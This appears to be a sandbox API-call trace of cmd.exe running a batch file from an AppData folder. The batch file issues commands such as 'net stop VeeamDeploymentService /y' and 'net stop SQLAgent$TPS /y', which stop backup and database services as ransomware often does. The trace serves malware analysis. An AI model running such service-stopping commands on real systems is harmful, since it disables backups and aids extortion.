[0047.981] GetProcessHeap () returned 0x3e0000 [0047.981] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0047.981] GetProcessHeap () returned 0x3e0000 [0047.981] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0047.981] GetProcessHeap () returned 0x3e0000 [0047.981] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fcaf0 | out: hHeap=0x3e0000) returned 1 [0047.981] GetProcessHeap () returned 0x3e0000 [0047.981] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0047.981] GetProcessHeap () returned 0x3e0000 [0047.981] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0047.981] _get_osfhandle (_FileHandle=3) returned 0x78 [0047.981] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x88c [0047.981] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x1035, lpOverlapped=0x0) returned 1 [0047.981] SetFilePointer (in: hFile=0x78, lDistanceToMove=2224, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8b0 [0047.981] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=36, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop VeeamDeploymentService /y\r\nMENT /y\r\nÇ¥ /y\r\nlures\r\nnded\r\n") returned 36 [0047.981] _get_osfhandle (_FileHandle=3) returned 0x78 [0047.981] GetFileType (hFile=0x78) returned 0x1 [0047.982] _get_osfhandle (_FileHandle=3) returned 0x78 [0047.982] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8b0 [0047.982] GetProcessHeap () returned 0x3e0000 [0047.982] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0047.982] GetProcessHeap () returned 0x3e0000 [0047.982] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0047.982] _tell (_FileHandle=3) returned 2224 [0047.982] _close (_FileHandle=3) returned 0 [0047.982] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0047.982] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0047.982] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0047.983] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0047.983] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0047.983] _wcsicmp (_String1="net", _String2="CD") returned 11 [0047.983] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0047.983] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0047.983] _wcsicmp (_String1="net", _String2="REN") returned -4 [0047.983] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0047.983] _wcsicmp (_String1="net", _String2="SET") returned -5 [0047.983] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0047.983] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0047.983] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0047.983] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0047.983] _wcsicmp (_String1="net", _String2="MD") returned 1 [0047.983] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0047.983] _wcsicmp (_String1="net", _String2="RD") returned -4 [0047.983] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0047.983] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0047.983] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0047.983] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0047.983] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0047.983] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0047.983] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0047.983] _wcsicmp (_String1="net", _String2="VER") returned -8 [0047.983] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0047.983] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0047.983] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0047.983] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0047.983] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0047.983] _wcsicmp (_String1="net", _String2="START") returned -5 [0047.983] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0047.983] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0047.983] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0047.983] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0047.983] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0047.983] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0047.983] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0047.984] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0047.984] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0047.984] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0047.984] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0047.984] SetErrorMode (uMode=0x0) returned 0x1 [0047.984] GetProcessHeap () returned 0x3e0000 [0047.984] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0047.984] GetProcessHeap () returned 0x3e0000 [0047.984] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0047.984] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0047.984] GetProcessHeap () returned 0x3e0000 [0047.984] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0047.984] GetProcessHeap () returned 0x3e0000 [0047.984] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0047.984] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0047.984] GetProcessHeap () returned 0x3e0000 [0047.984] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0047.984] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0047.984] GetProcessHeap () returned 0x3e0000 [0047.984] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0047.984] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0047.984] GetProcessHeap () returned 0x3e0000 [0047.984] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0047.984] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0047.984] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0047.985] GetLastError () returned 0x2 [0047.985] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0047.985] GetLastError () returned 0x2 [0047.985] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0047.985] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0047.985] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0047.985] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0047.985] GetLastError () returned 0x2 [0047.985] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0047.985] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0047.986] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0047.986] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0047.986] SetErrorMode (uMode=0x0) returned 0x1 [0047.986] GetProcessHeap () returned 0x3e0000 [0047.986] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0047.986] GetProcessHeap () returned 0x3e0000 [0047.986] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0047.986] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0047.986] GetProcessHeap () returned 0x3e0000 [0047.986] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0047.986] GetProcessHeap () returned 0x3e0000 [0047.986] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0047.986] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0047.986] GetProcessHeap () returned 0x3e0000 [0047.986] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0047.986] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0047.986] GetProcessHeap () returned 0x3e0000 [0047.986] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0047.986] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0047.986] GetProcessHeap () returned 0x3e0000 [0047.986] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0047.986] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0047.986] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0047.987] GetLastError () returned 0x2 [0047.987] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0047.987] GetLastError () returned 0x2 [0047.987] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0047.987] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0047.987] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0047.987] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0047.987] GetLastError () returned 0x2 [0047.987] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0047.987] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0047.988] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0047.988] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0047.988] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0047.988] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0047.988] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0047.988] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop VeeamDeploymentService /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop VeeamDeploymentService /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop VeeamDeploymentService /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0x898, dwThreadId=0x9fc)) returned 1 [0047.992] CloseHandle (hObject=0x78) returned 1 [0047.992] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0047.992] GetProcessHeap () returned 0x3e0000 [0047.992] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0047.992] GetEnvironmentStringsW () returned 0x3f8408* [0047.992] GetProcessHeap () returned 0x3e0000 [0047.992] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0047.992] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0047.992] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0048.173] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0048.174] CloseHandle (hObject=0x74) returned 1 [0048.174] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0048.174] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0048.174] GetProcessHeap () returned 0x3e0000 [0048.174] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0048.174] GetEnvironmentStringsW () returned 0x3f8408* [0048.174] GetProcessHeap () returned 0x3e0000 [0048.174] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0048.174] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0048.174] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0048.174] GetProcessHeap () returned 0x3e0000 [0048.174] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0048.174] GetEnvironmentStringsW () returned 0x3f8408* [0048.174] GetProcessHeap () returned 0x3e0000 [0048.174] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0048.174] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0048.174] GetProcessHeap () returned 0x3e0000 [0048.174] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0048.174] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0048.174] _get_osfhandle (_FileHandle=1) returned 0x264 [0048.174] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0048.175] _get_osfhandle (_FileHandle=1) returned 0x264 [0048.175] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0048.175] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0048.175] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0048.175] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0048.175] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0048.176] SetConsoleInputExeNameW () returned 0x1 [0048.176] GetConsoleOutputCP () returned 0x1b5 [0048.176] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0048.176] SetThreadUILanguage (LangId=0x0) returned 0x409 [0048.176] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0048.176] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0048.176] _get_osfhandle (_FileHandle=3) returned 0x74 [0048.176] SetFilePointer (in: hFile=0x74, lDistanceToMove=2224, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8b0 [0048.176] GetProcessHeap () returned 0x3e0000 [0048.176] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0048.176] GetProcessHeap () returned 0x3e0000 [0048.176] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0048.176] GetProcessHeap () returned 0x3e0000 [0048.176] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0048.176] GetProcessHeap () returned 0x3e0000 [0048.176] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0048.176] GetProcessHeap () returned 0x3e0000 [0048.176] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0048.176] GetProcessHeap () returned 0x3e0000 [0048.176] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0048.176] GetProcessHeap () returned 0x3e0000 [0048.176] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0048.176] GetProcessHeap () returned 0x3e0000 [0048.176] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0048.177] GetProcessHeap () returned 0x3e0000 [0048.177] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0048.177] GetProcessHeap () returned 0x3e0000 [0048.177] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0048.177] GetProcessHeap () returned 0x3e0000 [0048.177] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0048.177] GetProcessHeap () returned 0x3e0000 [0048.177] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0048.177] GetProcessHeap () returned 0x3e0000 [0048.177] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0048.177] _get_osfhandle (_FileHandle=3) returned 0x74 [0048.177] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8b0 [0048.177] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x1011, lpOverlapped=0x0) returned 1 [0048.177] SetFilePointer (in: hFile=0x74, lDistanceToMove=2250, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8ca [0048.177] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=26, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop SQLAgent$TPS /y\r\nrvice /y\r\nMENT /y\r\nÇ¥ /y\r\nlures\r\nnded\r\n") returned 26 [0048.177] _get_osfhandle (_FileHandle=3) returned 0x74 [0048.177] GetFileType (hFile=0x74) returned 0x1 [0048.177] _get_osfhandle (_FileHandle=3) returned 0x74 [0048.177] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8ca [0048.177] GetProcessHeap () returned 0x3e0000 [0048.177] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0048.177] GetProcessHeap () returned 0x3e0000 [0048.177] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0048.178] _tell (_FileHandle=3) returned 2250 [0048.178] _close (_FileHandle=3) returned 0 [0048.178] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0048.178] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0048.178] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0048.178] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0048.178] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0048.178] _wcsicmp (_String1="net", _String2="CD") returned 11 [0048.178] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0048.178] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0048.178] _wcsicmp (_String1="net", _String2="REN") returned -4 [0048.178] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0048.178] _wcsicmp (_String1="net", _String2="SET") returned -5 [0048.178] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0048.178] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0048.178] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0048.179] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0048.179] _wcsicmp (_String1="net", _String2="MD") returned 1 [0048.179] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0048.179] _wcsicmp (_String1="net", _String2="RD") returned -4 [0048.179] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0048.179] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0048.179] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0048.179] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0048.179] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0048.179] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0048.179] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0048.179] _wcsicmp (_String1="net", _String2="VER") returned -8 [0048.179] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0048.179] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0048.179] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0048.179] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0048.179] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0048.179] _wcsicmp (_String1="net", _String2="START") returned -5 [0048.179] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0048.179] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0048.179] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0048.179] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0048.179] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0048.179] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0048.179] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0048.179] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0048.179] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0048.179] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0048.179] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0048.179] SetErrorMode (uMode=0x0) returned 0x1 [0048.181] GetProcessHeap () returned 0x3e0000 [0048.181] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0048.181] GetProcessHeap () returned 0x3e0000 [0048.181] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0048.181] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0048.181] GetProcessHeap () returned 0x3e0000 [0048.181] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0048.181] GetProcessHeap () returned 0x3e0000 [0048.181] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0048.181] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0048.181] GetProcessHeap () returned 0x3e0000 [0048.181] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0048.181] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0048.181] GetProcessHeap () returned 0x3e0000 [0048.181] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0048.181] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0048.181] GetProcessHeap () returned 0x3e0000 [0048.181] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0048.181] GetDriveTypeW 